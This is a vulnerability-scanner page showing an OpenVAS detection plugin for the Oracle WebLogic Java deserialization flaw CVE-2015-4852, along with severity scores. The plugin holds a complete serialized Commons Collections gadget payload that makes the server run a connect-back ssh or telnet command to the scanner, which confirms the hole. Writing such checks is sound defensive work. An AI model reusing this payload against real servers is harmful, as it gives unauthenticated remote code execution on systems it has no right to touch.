Lucene search

K
openvasCopyright (C) 2016 Greenbone AGOPENVAS:1361412562310105829
HistoryJul 27, 2016 - 12:00 a.m.

Oracle WebLogic Server Java Deserialization Vulnerability

2016-07-2700:00:00
Copyright (C) 2016 Greenbone AG
plugins.openvas.org
538

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.5 High

AI Score

Confidence

High

0.967 High

EPSS

Percentile

99.7%

Oracle WebLogic Server is prone to a remote code-execution vulnerability.

# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:bea:weblogic_server";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105829");
  script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
  script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
  script_cve_id("CVE-2015-4852");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_version("2023-12-26T05:05:23+0000");

  script_name("Oracle WebLogic Server Java Deserialization Vulnerability");

  script_xref(name:"URL", value:"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/");
  script_xref(name:"URL", value:"http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html");

  script_tag(name:"impact", value:"Successfully exploiting this issue allows attackers to execute arbitrary code
  in the context of the affected application.");

  script_tag(name:"vuldetect", value:"Send a serialized java object which try to open a ssh connection to a random
  port on the scanner and then check for the tcp-syn packet from this connection.");

  script_tag(name:"insight", value:"Unsafe deserialization allows unauthenticated remote attackers to run
  arbitrary code on the Jboss server.");

  script_tag(name:"solution", value:"Updates are available. Please see the references or vendor advisory for more information.");

  script_tag(name:"summary", value:"Oracle WebLogic Server is prone to a remote code-execution vulnerability.");

  script_tag(name:"affected", value:"Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_active");

  script_tag(name:"last_modification", value:"2023-12-26 05:05:23 +0000 (Tue, 26 Dec 2023)");
  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2023-12-21 01:31:00 +0000 (Thu, 21 Dec 2023)");
  script_tag(name:"creation_date", value:"2016-07-27 14:18:32 +0200 (Wed, 27 Jul 2016)");
  script_category(ACT_ATTACK);
  script_family("Web Servers");
  script_copyright("Copyright (C) 2016 Greenbone AG");
  script_dependencies("gb_oracle_weblogic_consolidation.nasl", "os_detection.nasl");
  script_mandatory_keys("oracle/weblogic/detected");
  script_require_ports("Services/weblogic-t3", 7001);

  exit(0);
}

include("misc_func.inc");
include("host_details.inc");
include("os_func.inc");

if( ! port = get_app_port( cpe:CPE, service: "weblogic-t3" ) )
  exit( 0 );

if( ! soc = open_sock_tcp( port ) )
  exit( 0 );

req = 't3 12.2.1\n' +
      'AS:255\n' +
      'HL:19\n' +
      'MS:10000000\n' +
      'PU:t3://us-l-breens:7001\n\n';

send( socket:soc, data:req );
buf = recv( socket:soc, length:128 );

if( "HELO" >!< buf ) {
  close( soc );
  exit( 0 );
}

payload = raw_string(
0x01,0x65,0x01,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x71,0x00,
0x00,0xea,0x60,0x00,0x00,0x00,0x18,0x43,0x2e,0xc6,0xa2,0xa6,0x39,0x85,0xb5,0xaf,
0x7d,0x63,0xe6,0x43,0x83,0xf4,0x2a,0x6d,0x92,0xc9,0xe9,0xaf,0x0f,0x94,0x72,0x02,
0x79,0x73,0x72,0x00,0x78,0x72,0x01,0x78,0x72,0x02,0x78,0x70,0x00,0x00,0x00,0x0c,
0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,
0x00,0x70,0x70,0x70,0x70,0x70,0x70,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x02,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x70,0x06,0xfe,0x01,
0x00,0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x1d,0x77,0x65,0x62,0x6c,0x6f,0x67,
0x69,0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x43,0x6c,0x61,0x73,0x73,0x54,0x61,0x62,
0x6c,0x65,0x45,0x6e,0x74,0x72,0x79,0x2f,0x52,0x65,0x81,0x57,0xf4,0xf9,0xed,0x0c,
0x00,0x00,0x78,0x70,0x72,0x00,0x24,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2e,
0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,0x6c,0x2e,
0x50,0x61,0x63,0x6b,0x61,0x67,0x65,0x49,0x6e,0x66,0x6f,0xe6,0xf7,0x23,0xe7,0xb8,
0xae,0x1e,0xc9,0x02,0x00,0x09,0x49,0x00,0x05,0x6d,0x61,0x6a,0x6f,0x72,0x49,0x00,
0x05,0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,0x61,0x74,0x63,0x68,0x55,0x70,
0x64,0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,0x6c,0x69,0x6e,0x67,0x50,0x61,
0x74,0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x61,0x63,
0x6b,0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,0x61,0x72,0x79,0x50,0x61,0x74,
0x63,0x68,0x4c,0x00,0x09,0x69,0x6d,0x70,0x6c,0x54,0x69,0x74,0x6c,0x65,0x74,0x00,
0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,
0x6e,0x67,0x3b,0x4c,0x00,0x0a,0x69,0x6d,0x70,0x6c,0x56,0x65,0x6e,0x64,0x6f,0x72,
0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x0b,0x69,0x6d,0x70,0x6c,0x56,0x65,0x72,0x73,
0x69,0x6f,0x6e,0x71,0x00,0x7e,0x00,0x03,0x78,0x70,0x77,0x02,0x00,0x00,0x78,0xfe,
0x01,0x00,0x00);

payload += raw_string(
0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x73,0x75,0x6e,0x2e,0x72,0x65,0x66,0x6c,
0x65,0x63,0x74,0x2e,0x61,0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x41,
0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,
0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x55,0xca,0xf5,0x0f,0x15,0xcb,
0x7e,0xa5,0x02,0x00,0x02,0x4c,0x00,0x0c,0x6d,0x65,0x6d,0x62,0x65,0x72,0x56,0x61,
0x6c,0x75,0x65,0x73,0x74,0x00,0x0f,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,
0x6c,0x2f,0x4d,0x61,0x70,0x3b,0x4c,0x00,0x04,0x74,0x79,0x70,0x65,0x74,0x00,0x11,
0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,
0x3b,0x78,0x70,0x73,0x7d,0x00,0x00,0x00,0x01,0x00,0x0d,0x6a,0x61,0x76,0x61,0x2e,
0x75,0x74,0x69,0x6c,0x2e,0x4d,0x61,0x70,0x78,0x72,0x00,0x17,0x6a,0x61,0x76,0x61,
0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2e,0x50,0x72,
0x6f,0x78,0x79,0xe1,0x27,0xda,0x20,0xcc,0x10,0x43,0xcb,0x02,0x00,0x01,0x4c,0x00,
0x01,0x68,0x74,0x00,0x25,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,
0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2f,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,
0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x3b,0x78,0x70,0x73,0x71,0x00,0x7e,
0x00,0x00,0x73,0x72,0x00,0x2a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,
0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,
0x69,0x6f,0x6e,0x73,0x2e,0x6d,0x61,0x70,0x2e,0x4c,0x61,0x7a,0x79,0x4d,0x61,0x70,
0x6e,0xe5,0x94,0x82,0x9e,0x79,0x10,0x94,0x03,0x00,0x01,0x4c,0x00,0x07,0x66,0x61,
0x63,0x74,0x6f,0x72,0x79,0x74,0x00,0x2c,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,
0x63,0x68,0x65,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,
0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,
0x6d,0x65,0x72,0x3b,0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,
0x61,0x63,0x68,0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,
0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,
0x73,0x2e,0x43,0x68,0x61,0x69,0x6e,0x65,0x64,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,
0x72,0x6d,0x65,0x72,0x30,0xc7,0x97,0xec,0x28,0x7a,0x97,0x04,0x02,0x00,0x01,0x5b,
0x00,0x0d,0x69,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x73,0x74,
0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,0x63,0x68,0x65,0x2f,0x63,
0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,
0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x3b,0x78,
0x70,0x75,0x72,0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,
0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,
0x74,0x69,0x6f,0x6e,0x73,0x2e,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,
0x72,0x3b,0xbd,0x56,0x2a,0xf1,0xd8,0x34,0x18,0x99,0x02,0x00,0x00,0x78,0x70,0x00,
0x00,0x00,0x05,0x73,0x72,0x00,0x3b,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,
0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,
0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x43,
0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,
0x65,0x72,0x58,0x76,0x90,0x11,0x41,0x02,0xb1,0x94,0x02,0x00,0x01,0x4c,0x00,0x09,
0x69,0x43,0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,
0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x78,0x70,
0x76,0x72,0x00,0x11,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x52,0x75,
0x6e,0x74,0x69,0x6d,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,
0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,
0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x49,0x6e,
0x76,0x6f,0x6b,0x65,0x72,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,
0x87,0xe8,0xff,0x6b,0x7b,0x7c,0xce,0x38,0x02,0x00,0x03,0x5b,0x00,0x05,0x69,0x41,
0x72,0x67,0x73,0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,
0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0b,0x69,0x4d,0x65,0x74,
0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,
0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x0b,0x69,
0x50,0x61,0x72,0x61,0x6d,0x54,0x79,0x70,0x65,0x73,0x74,0x00,0x12,0x5b,0x4c,0x6a,
0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,0x3b,0x78,
0x70,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,
0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,
0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x02,0x74,0x00,0x0a,0x67,0x65,0x74,0x52,
0x75,0x6e,0x74,0x69,0x6d,0x65,0x75,0x72,0x00,0x12,0x5b,0x4c,0x6a,0x61,0x76,0x61,
0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x43,0x6c,0x61,0x73,0x73,0x3b,0xab,0x16,0xd7,0xae,
0xcb,0xcd,0x5a,0x99,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x00,0x74,0x00,0x09,
0x67,0x65,0x74,0x4d,0x65,0x74,0x68,0x6f,0x64,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,
0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,
0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0xa0,0xf0,0xa4,0x38,0x7a,0x3b,0xb3,0x42,0x02,
0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1e,0x73,0x71,0x00,0x7e,0x00,0x16,
0x75,0x71,0x00,0x7e,0x00,0x1b,0x00,0x00,0x00,0x02,0x70,0x75,0x71,0x00,0x7e,0x00,
0x1b,0x00,0x00,0x00,0x00,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x75,0x71,
0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,
0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1b,0x73,
0x71,0x00,0x7e,0x00,0x16,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,
0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,
0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00);

lport = rand() % 64512 + 1024;

if( os_host_runs("Windows") == "yes" )
  cmd = 'telnet ' + this_host() + ' ' + lport;
else
  cmd = 'ssh -q -i /dev/null -p ' + lport + ' ' + this_host();

len = raw_string( strlen( cmd ) );

payload += len + cmd + raw_string(
0x74,0x00,0x04,0x65,0x78,0x65,0x63,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,
0x01,0x71,0x00,0x7e,0x00,0x23,0x73,0x71,0x00,0x7e,0x00,0x11,0x73,0x72,0x00,0x11,
0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,
0x72,0x12,0xe2,0xa0,0xa4,0xf7,0x81,0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,
0x61,0x6c,0x75,0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,
0x67,0x2e,0x4e,0x75,0x6d,0x62,0x65,0x72,0x86,0xac,0x95,0x1d,0x0b,0x94,0xe0,0x8b,
0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,
0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x48,0x61,0x73,0x68,0x4d,0x61,0x70,0x05,0x07,
0xda,0xc1,0xc3,0x16,0x60,0xd1,0x03,0x00,0x02,0x46,0x00,0x0a,0x6c,0x6f,0x61,0x64,
0x46,0x61,0x63,0x74,0x6f,0x72,0x49,0x00,0x09,0x74,0x68,0x72,0x65,0x73,0x68,0x6f,
0x6c,0x64,0x78,0x70,0x3f,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x77,0x08,0x00,0x00,
0x00,0x10,0x00,0x00,0x00,0x00,0x78,0x78,0x76,0x72,0x00,0x12,0x6a,0x61,0x76,0x61,
0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x76,0x65,0x72,0x72,0x69,0x64,0x65,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x71,0x00,0x7e,0x00,0x3a);

payload += raw_string(
0xfe,0x01,0x00,0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x1d,0x77,0x65,0x62,0x6c,
0x6f,0x67,0x69,0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x43,0x6c,0x61,0x73,0x73,0x54,
0x61,0x62,0x6c,0x65,0x45,0x6e,0x74,0x72,0x79,0x2f,0x52,0x65,0x81,0x57,0xf4,0xf9,
0xed,0x0c,0x00,0x00,0x78,0x70,0x72,0x00,0x21,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,
0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,
0x6c,0x2e,0x50,0x65,0x65,0x72,0x49,0x6e,0x66,0x6f,0x58,0x54,0x74,0xf3,0x9b,0xc9,
0x08,0xf1,0x02,0x00,0x07,0x49,0x00,0x05,0x6d,0x61,0x6a,0x6f,0x72,0x49,0x00,0x05,
0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,0x61,0x74,0x63,0x68,0x55,0x70,0x64,
0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,0x6c,0x69,0x6e,0x67,0x50,0x61,0x74,
0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x61,0x63,0x6b,
0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,0x61,0x72,0x79,0x50,0x61,0x74,0x63,
0x68,0x5b,0x00,0x08,0x70,0x61,0x63,0x6b,0x61,0x67,0x65,0x73,0x74,0x00,0x27,0x5b,
0x4c,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,
0x2f,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,0x6c,0x2f,0x50,0x61,0x63,0x6b,0x61,0x67,
0x65,0x49,0x6e,0x66,0x6f,0x3b,0x78,0x72,0x00,0x24,0x77,0x65,0x62,0x6c,0x6f,0x67,
0x69,0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,
0x61,0x6c,0x2e,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x49,0x6e,0x66,0x6f,0x97,0x22,
0x45,0x51,0x64,0x52,0x46,0x3e,0x02,0x00,0x03,0x5b,0x00,0x08,0x70,0x61,0x63,0x6b,
0x61,0x67,0x65,0x73,0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x0e,0x72,0x65,0x6c,0x65,
0x61,0x73,0x65,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x74,0x00,0x12,0x4c,0x6a,0x61,
0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,
0x00,0x12,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e,0x49,0x6e,0x66,0x6f,0x41,0x73,0x42,
0x79,0x74,0x65,0x73,0x74,0x00,0x02,0x5b,0x42,0x78,0x72,0x00,0x24,0x77,0x65,0x62,
0x6c,0x6f,0x67,0x69,0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,
0x65,0x72,0x6e,0x61,0x6c,0x2e,0x50,0x61,0x63,0x6b,0x61,0x67,0x65,0x49,0x6e,0x66,
0x6f,0xe6,0xf7,0x23,0xe7,0xb8,0xae,0x1e,0xc9,0x02,0x00,0x09,0x49,0x00,0x05,0x6d,
0x61,0x6a,0x6f,0x72,0x49,0x00,0x05,0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,
0x61,0x74,0x63,0x68,0x55,0x70,0x64,0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,
0x6c,0x69,0x6e,0x67,0x50,0x61,0x74,0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,
0x69,0x63,0x65,0x50,0x61,0x63,0x6b,0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,
0x61,0x72,0x79,0x50,0x61,0x74,0x63,0x68,0x4c,0x00,0x09,0x69,0x6d,0x70,0x6c,0x54,
0x69,0x74,0x6c,0x65,0x71,0x00,0x7e,0x00,0x05,0x4c,0x00,0x0a,0x69,0x6d,0x70,0x6c,
0x56,0x65,0x6e,0x64,0x6f,0x72,0x71,0x00,0x7e,0x00,0x05,0x4c,0x00,0x0b,0x69,0x6d,
0x70,0x6c,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x71,0x00,0x7e,0x00,0x05,0x78,0x70,
0x77,0x02,0x00,0x00,0x78,0xfe,0x00,0xff,0xfe,0x01,0x00,0x00,0xac,0xed,0x00,0x05,
0x73,0x72,0x00,0x13,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2e,0x72,0x6a,0x76,
0x6d,0x2e,0x4a,0x56,0x4d,0x49,0x44,0xdc,0x49,0xc2,0x3e,0xde,0x12,0x1e,0x2a,0x0c,
0x00,0x00,0x78,0x70,0x77,0x46,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x09,0x31,0x32,0x37,0x2e,0x30,0x2e,0x31,0x2e,0x31,0x00,0x0b,0x75,0x73,0x2d,0x6c,
0x2d,0x62,0x72,0x65,0x65,0x6e,0x73,0xa5,0x3c,0xaf,0xf1,0x00,0x00,0x00,0x07,0x00,
0x00,0x1b,0x59,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x78,0xfe,0x01,0x00,
0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x13,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,
0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x4a,0x56,0x4d,0x49,0x44,0xdc,0x49,0xc2,0x3e,
0xde,0x12,0x1e,0x2a,0x0c,0x00,0x00,0x78,0x70,0x77,0x1d,0x01,0x81,0x40,0x12,0x81,
0x34,0xbf,0x42,0x76,0x00,0x09,0x31,0x32,0x37,0x2e,0x30,0x2e,0x31,0x2e,0x31,0xa5,
0x3c,0xaf,0xf1,0x00,0x00,0x00,0x00,0x00,0x78);

plen = raw_string( strlen( payload ) );

payload = raw_string( 0x00,0x00,0x09 ) + plen + payload;

filter = 'tcp and src ' + get_host_ip() + ' and dst ' + this_host() + ' and dst port ' + lport;

res = send_capture( socket:soc,
                    data:payload,
                    timeout:5,
                    pcap_filter:filter );

close( soc );

if( res ) {
  flags = get_tcp_element( tcp: res, element: "th_flags" );
  if( ( flags & TH_SYN ) ) {
    report = 'It was possible to execute the command `' + cmd + '` on the remote host. The TCP-SYN request to port ' + lport + ' was then successfully captured.';
    security_message( port:port, data:report );
    exit( 0 );
  }
}

exit( 99 );

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.5 High

AI Score

Confidence

High

0.967 High

EPSS

Percentile

99.7%